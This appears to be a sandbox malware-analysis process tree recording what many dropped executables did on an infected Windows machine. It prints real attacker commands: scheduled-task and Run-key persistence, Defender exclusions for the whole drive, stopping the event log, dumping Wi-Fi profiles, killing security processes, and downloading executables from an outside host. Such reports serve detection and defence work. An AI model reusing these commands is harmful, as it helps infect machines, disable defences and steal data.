C:\Users\Admin\AppData\Local\Temp\Files\networa.exe"C:\Users\Admin\AppData\Local\Temp\Files\networa.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe"C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 11243⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup.exe"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe"C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 8164⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u3ts.1.exe"C:\Users\Admin\AppData\Local\Temp\u3ts.1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 12515⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 11443⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost1.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost1.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Files\am.exe"C:\Users\Admin\AppData\Local\Temp\Files\am.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\i.exe"C:\Users\Admin\AppData\Local\Temp\Files\i.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe"C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'A_second_wind_for_important_cases';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'A_second_wind_for_important_cases' -Value '"C:\Users\Admin\AppData\Local\A_second_wind_for_important_cases\A_second_wind_for_important_cases.exe"' -PropertyType 'String'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\minuscrypt_crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\minuscrypt_crypted.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1692 -s 4963⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\first.exe"C:\Users\Admin\AppData\Local\Temp\Files\first.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\baseline.exe"C:\Users\Admin\AppData\Local\Temp\Files\baseline.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\alex.exe"C:\Users\Admin\AppData\Local\Temp\Files\alex.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe"C:\Users\Admin\AppData\Roaming\configurationValue\Logs.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\f60f0ba310\qemu-ga.exe"C:\Users\Admin\AppData\Local\Temp\f60f0ba310\qemu-ga.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe"C:\Users\Admin\AppData\Roaming\configurationValue\olehps.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"3⤵
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"4⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe"3⤵
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\timeout.exetimeout /t 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\Files\Machinegggg.exe"C:\Users\Admin\AppData\Local\Temp\Files\Machinegggg.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_lXNcTC.exe"C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_lXNcTC.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 14403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe"C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\Files\lada.exe"C:\Users\Admin\AppData\Local\Temp\Files\lada.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Files\XMRig.exe"C:\Users\Admin\AppData\Local\Temp\Files\XMRig.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "ACULXOBT"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "ACULXOBT" binpath= "C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "ACULXOBT"3⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\Files\2-3-1_2023-12-14_13-35.exe"C:\Users\Admin\AppData\Local\Temp\Files\2-3-1_2023-12-14_13-35.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 73003⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\svchost.exe"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\svchost.exe"C:\Windows\svchost.exe" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"8⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe9⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"10⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe11⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"12⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe13⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"14⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe15⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"16⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe17⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"18⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe19⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"20⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe21⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"22⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe23⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe25⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe"26⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\stub.exeC:\Users\Admin\AppData\Local\Temp\3582-490\stub.exe27⤵
- Drops file in Windows directory
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\15C633~1.EXE"2⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\15C633~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\15C633~1.EXE3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"4⤵
- Blocklisted process makes network request
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\Temp\tel.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\Temp\tel.exeC:\Windows\Temp\tel.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1566⤵
- Program crash
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\Temp\fcc.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\Temp\fcc.exeC:\Windows\Temp\fcc.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe\bebra.exe6⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\Temp\jjj.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\Temp\jjj.exeC:\Windows\Temp\jjj.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 2406⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1332 -ip 13321⤵
-
C:\DriverHostCrtNet\comSvc.exe"C:\DriverHostCrtNet\comSvc.exe"1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6bOuYaabJ9.bat"2⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵
-
C:\DriverHostCrtNet\4363463463464363463463463.exe"C:\DriverHostCrtNet\4363463463464363463463463.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ae9414f3-5cc8-4ee3-b156-8e00e0d505c5.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5feb41f3-71ea-4ee5-8080-cc28895b2a1d.vbs"4⤵
-
C:\DriverHostCrtNet\4363463463464363463463463.exeC:\DriverHostCrtNet\4363463463464363463463463.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Uninstall Information\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\odt\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4960 -ip 49601⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\pris\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Temp\Files\ofg7d45fsdfgg312.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST1⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\odt\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\odt\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\odt\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\DriverHostCrtNet\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "networan" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Mail\networa.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "networan" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Mail\networa.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'first.exe'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\move.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\Users.exeusers.exe2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Macromedia\ser.bat" "3⤵
- Checks computer location settings
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/tibokUS.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 64⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\reg.exereg add "hkcu\software\microsoft\windows\currentversion" /v "alg" /t reg_sz /d svr.vbs /f4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz2.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im safesurf.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im surfguard.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Macromedia\wmild.exewmild.exe -c http://duserifram.toshibanetcam.com/ASUFUSER.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f4⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f4⤵
- Modifies registry key
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nvidsrv.exe4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\reg.exereg delete "hkcu\software\microsoft\windows\currentversion" /v "alg" /f4⤵
-
C:\Windows\SysWOW64\find.exefind "svr.vbs"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exeREG QUERY hkcu\software\microsoft\windows\currentversion4⤵
- Modifies registry key
-
